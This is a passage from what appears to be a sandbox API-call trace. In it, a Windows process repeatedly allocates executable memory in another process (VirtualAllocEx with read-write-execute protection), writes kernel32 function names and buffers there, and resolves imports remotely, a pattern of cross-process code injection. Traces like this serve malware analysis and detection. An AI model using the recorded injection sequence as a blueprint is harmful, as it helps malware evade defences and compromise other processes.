lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d57c*, lpNumberOfBytesWritten=0xcd978*=0xf) returned 1 [0184.487] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.487] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84f90 [0184.487] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.487] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84f90*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84f90*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.488] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.488] ResetEvent (hEvent=0x794) returned 1 [0184.488] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.488] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.488] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.488] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84f90 | out: hHeap=0x2150000) returned 1 [0184.489] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.489] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.489] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.489] lstrlenA (lpString="InitializeCriticalSectionAndSpinCount") returned 37 [0184.489] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x26, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.489] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d58e*, nSize=0x26, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d58e*, lpNumberOfBytesWritten=0xcd978*=0x26) returned 1 [0184.490] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.490] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84870 [0184.490] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.490] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84870*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84870*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.490] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.491] ResetEvent (hEvent=0x794) returned 1 [0184.491] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.491] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.491] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.491] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84870 | out: hHeap=0x2150000) returned 1 [0184.491] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.491] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.492] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.492] lstrlenA (lpString="TlsAlloc") returned 8 [0184.492] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.492] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d5b6*, nSize=0x9, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d5b6*, lpNumberOfBytesWritten=0xcd978*=0x9) returned 1 [0184.492] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.492] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85080 [0184.492] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.493] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85080*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85080*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.493] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.493] ResetEvent (hEvent=0x794) returned 1 [0184.493] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.494] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.494] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.494] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85080 | out: hHeap=0x2150000) returned 1 [0184.494] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.494] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.494] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.494] lstrlenA (lpString="TlsGetValue") returned 11 [0184.494] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.494] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d5c2*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d5c2*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0184.495] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.495] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85080 [0184.495] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.495] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85080*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85080*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.496] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.496] ResetEvent (hEvent=0x794) returned 1 [0184.496] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.497] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.497] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.497] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85080 | out: hHeap=0x2150000) returned 1 [0184.497] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.497] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.498] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.498] lstrlenA (lpString="TlsSetValue") returned 11 [0184.498] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.498] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d5d0*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d5d0*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0184.498] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.498] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e847b0 [0184.498] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.498] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e847b0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e847b0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.499] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.499] ResetEvent (hEvent=0x794) returned 1 [0184.499] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.499] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.499] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.500] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e847b0 | out: hHeap=0x2150000) returned 1 [0184.500] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.500] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.500] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.500] lstrlenA (lpString="TlsFree") returned 7 [0184.500] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.500] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d5de*, nSize=0x8, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d5de*, lpNumberOfBytesWritten=0xcd978*=0x8) returned 1 [0184.501] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.501] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84930 [0184.501] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.501] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84930*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84930*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.501] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.502] ResetEvent (hEvent=0x794) returned 1 [0184.502] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.502] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.502] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.502] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84930 | out: hHeap=0x2150000) returned 1 [0184.502] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.503] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.503] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.503] lstrlenA (lpString="GetSystemTimeAsFileTime") returned 23 [0184.503] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.503] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d5e8*, nSize=0x18, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d5e8*, lpNumberOfBytesWritten=0xcd978*=0x18) returned 1 [0184.503] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.504] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84d20 [0184.504] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.504] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84d20*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84d20*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.504] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.505] ResetEvent (hEvent=0x794) returned 1 [0184.505] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.505] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.505] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.505] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84d20 | out: hHeap=0x2150000) returned 1 [0184.505] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.505] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.506] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.506] lstrlenA (lpString="GetModuleHandleW") returned 16 [0184.506] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.506] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d602*, nSize=0x11, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d602*, lpNumberOfBytesWritten=0xcd978*=0x11) returned 1 [0184.506] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.506] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84d20 [0184.506] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.507] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84d20*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84d20*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.507] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.531] ResetEvent (hEvent=0x794) returned 1 [0184.531] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.531] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.531] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.531] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84d20 | out: hHeap=0x2150000) returned 1 [0184.531] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.532] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.532] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.532] lstrlenA (lpString="GetStringTypeW") returned 14 [0184.532] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.532] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d616*, nSize=0xf, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d616*, lpNumberOfBytesWritten=0xcd978*=0xf) returned 1 [0184.533] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.533] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84e70 [0184.533] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.533] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84e70*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84e70*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.533] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.534] ResetEvent (hEvent=0x794) returned 1 [0184.534] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.534] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.534] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.534] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84e70 | out: hHeap=0x2150000) returned 1 [0184.534] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.535] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.535] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.535] lstrlenA (lpString="RtlCaptureContext") returned 17 [0184.535] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.535] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d628*, nSize=0x12, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d628*, lpNumberOfBytesWritten=0xcd978*=0x12) returned 1 [0184.536] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.536] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e847e0 [0184.536] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.536] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e847e0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e847e0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.536] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.537] ResetEvent (hEvent=0x794) returned 1 [0184.537] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.537] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.537] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.537] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e847e0 | out: hHeap=0x2150000) returned 1 [0184.537] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.537] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.538] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.538] lstrlenA (lpString="RtlLookupFunctionEntry") returned 22 [0184.538] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.538] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d63c*, nSize=0x17, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d63c*, lpNumberOfBytesWritten=0xcd978*=0x17) returned 1 [0184.538] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.538] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84c60 [0184.538] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.539] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84c60*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84c60*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.539] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.539] ResetEvent (hEvent=0x794) returned 1 [0184.539] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.541] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.541] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.542] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84c60 | out: hHeap=0x2150000) returned 1 [0184.542] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.542] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.542] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.543] lstrlenA (lpString="RtlVirtualUnwind") returned 16 [0184.543] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.544] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d656*, nSize=0x11, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d656*, lpNumberOfBytesWritten=0xcd978*=0x11) returned 1 [0184.544] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.545] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84e10 [0184.545] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.545] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84e10*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: 